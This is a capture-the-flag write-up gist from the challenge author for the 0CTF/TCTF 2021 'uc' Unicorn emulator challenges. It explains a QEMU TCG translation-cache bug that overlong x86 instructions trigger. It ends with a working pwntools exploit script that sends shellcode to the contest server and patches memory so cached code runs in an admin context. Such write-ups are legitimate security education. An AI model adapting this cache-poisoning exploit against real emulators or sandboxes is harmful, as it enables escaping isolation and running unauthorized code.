Skip to content

Instantly share code, notes, and snippets.

@0xKira
Created July 6, 2021 13:10
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 0xKira/e865709fc47c328ffd6fac3da9d36f44 to your computer and use it in GitHub Desktop.
Save 0xKira/e865709fc47c328ffd6fac3da9d36f44 to your computer and use it in GitHub Desktop.
Solution for 0CTF/TCTF 2021 Quals uc series

uc_baaaby

The challenge requires players to write shellcode implementing MD5. The limitations are:

  1. One basic block, which means no jmp call like instructions.
  2. At most 0x233 instructions.
  3. Execute 0x2000 length code.

You can find implementation in assembly meet the demands: https://www.nayuki.io/page/fast-md5-hash-implementation-in-x86-assembly

Then use an infinite length x86 instruction to bypass the next two limitations. You can easily find it here: https://stackoverflow.com/questions/14698350/x86-64-asm-maximum-bytes-for-an-instruction/18972014

Both of the links are shown at the first if you Google. I deliberately made this challenge easy since I want to introduce the bug Unicorn has. Don't treat this as a feature, it's a bug! It's fixed upstream in QEMU commit. However, Unicorn uses an old version of QEMU, so it's affected.

uc_masteeer

A simple logic bug.

uc_goood

The bug mentioned before can lead to EoP inside a VM running in TCG mode, which is detailed explained by this Project Zero issue. When it comes to Unicorn, it doesn't work anymore. Because in Unicorn, you have only one CPU, and physical address and virtual address are one-to-one mapped. You can't create a situation that the issue did, which needs two different processes.

Then how does the bug somehow affects Unicorn? Let's dig more into TCG internal. All the codes below are taken from Unicorn v1.0.3.

TCG generates JIT code per basic block as a TB (Translation Block), and caches TB for efficiency. When the code executes to a new block, it first calls tb_find_fast to look for a cached TB in cpu->tb_jmp_cache. If not found, tb_find_slow will look for in tcg_ctx->tb_ctx.tb_phys_hash. If still not found, a new TB will be generated via tb_gen_code.

In tb_gen_code, it handles the situation that a basic block spans two pages.

    tcg_ctx->code_gen_ptr = (void *)(((uintptr_t)tcg_ctx->code_gen_ptr +
            code_gen_size + CODE_GEN_ALIGN - 1) & ~(CODE_GEN_ALIGN - 1));

    phys_page2 = -1;
    /* check next page if needed */
    if (tb->size) {
        target_ulong virt_page2 = (pc + tb->size - 1) & TARGET_PAGE_MASK;
        if ((pc & TARGET_PAGE_MASK) != virt_page2) {
            phys_page2 = get_page_addr_code(env, virt_page2);
        }
    }
    tb_link_page(cpu->uc, tb, phys_pc, phys_page2);
    return tb;

The second page's address is calculated by tcg_ctx->code_gen_ptr + code_gen_size and aligned. This code is correct as long as a basic block's size is smaller than a page. This is ensured by the following generating logic, it stops translation if the block is too large.

        /* if too long translation, stop generation too */
        if (tcg_ctx->gen_opc_ptr >= gen_opc_end ||
            (pc_ptr - pc_start) >= (TARGET_PAGE_SIZE - 32) ||
            num_insns >= max_insns) {
            gen_jmp_im(dc, pc_ptr - dc->cs_base);
            gen_eob(dc);
            block_full = true;
            break;
        }

However, the bug breaks this logic by inserting a long instruction, making the basic block spans three pages. The page in the middle will not be recorded by TCG. From the view of TCG, it considers the translated TB has only two pages. This page becomes an invisible page to TCG. No matter what you write to that page, it doesn't affect the TB cache.

But you may still not able to solve the challenge due to another issue.

Self-modifying code is a special challenge in x86 emulation because no instruction cache invalidation is signaled by the application when code is modified.

User-mode emulation marks a host page as write-protected (if it is not already read-only) every time translated code is generated for a basic block. Then, if a write access is done to the page, Linux raises a SEGV signal. QEMU then invalidates all the translated code in the page and enables write accesses to the page. For system emulation, write protection is achieved through the software MMU.

If there's any TB generated on the middle page, it will be protected. In tb_alloc_page:

#ifdef DEBUG_TB_INVALIDATE
        printf("protecting code page: 0x" TARGET_FMT_lx "\n",
               page_addr);
#endif
    }
#else
    /* if some code is already present, then the pages are already
       protected. So we handle the case where only the first TB is
       allocated in a physical page */
    if (!page_already_protected) {
        tlb_protect_code(uc, page_addr);
    }
#endif

I add a jmp instruction at the end of user shellcode to stop a long basic block. You shouldn't use your own shellcode to patch the code, or it will be protected and any write to that page will always flush the relevant TB caches.

So the intended solution is as following:

  1. Send shellcode invoking the backdoor.
  2. Use provided patch functionality to patch the jmp to the instruction prefix.
  3. Execute user shellcode to trigger cache generating.
  4. Execute admin code, cached TB will be executed.

It's really a shame that I made a mistake that the middle page is writable, so most teams solved it by modifying the admin shellcode. But GG to Shellphish, they solved it in my intended way. I'm glad at least one team did it that way.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import remote, p64
p = remote('111.186.59.29', 10088)
'''
push 0
mov rax, 0x67616c6664616572
push rax
mov rax, 0x2f62616c6e33336b
push rax
mov rsi, 0xbabecafe233
mov [rsi], rsp
'''
# These shellcode will be executed under admin context
payload = b'\x6a\x00\x48\xb8\x72\x65\x61\x64\x66\x6c\x61\x67\x50\x48\xb8\x6b\x33\x33\x6e\x6c\x61\x62\x2f\x50\x48\xbe\x33\xe2\xaf\xec\xab\x0b\x00\x00\x48\x89\x26'
payload = payload.ljust(0x1000 - 0xd, b'\xf0')
p.send(payload)
p.sendlineafter('?: ', '3')
p.sendafter('addr: ', p64(0xdeadbef1000 - 0xd))
p.sendafter('size: ', p64(0xd))
p.sendafter('data: ', b'\xf0' * 0xd)
p.sendlineafter('?: ', '2')
p.sendlineafter('(y/[n])', 'y')
p.sendlineafter('?: ', '1')
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment